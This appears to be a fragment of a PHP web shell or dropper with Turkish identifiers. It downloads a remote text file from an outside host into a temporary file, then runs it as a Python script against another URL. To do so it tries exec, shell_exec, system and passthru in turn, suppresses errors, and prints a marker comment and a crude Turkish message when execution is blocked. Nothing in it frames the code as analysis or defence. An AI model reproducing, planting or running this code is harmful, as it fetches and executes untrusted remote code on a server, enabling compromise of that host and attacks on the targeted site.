echo "<!--rahatinizabaakin-->";
$temp = tmpfile();
$dosya = @file_get_contents("http://bdmsproduction.com/dosya/x.txt");
fwrite($temp, $dosya);
$bilgi = stream_get_meta_data($temp);
$dizin = $bilgi['uri'];
$komut = "python {$dizin} http://www.46c8.com/";
if(function_exists('exec')){$sonuc = @exec($komut);}elseif(function_exists('shell_exec')){$sonuc = @shell_exec($komut);}elseif(function_exists('system')){$sonuc = @system($komut);}elseif(function_exists('passthru')){$sonuc = @passthru($komut);
}else{
echo "tum fonksiyonlar kapali aq";
}
print $sonuc;
fclose($temp);
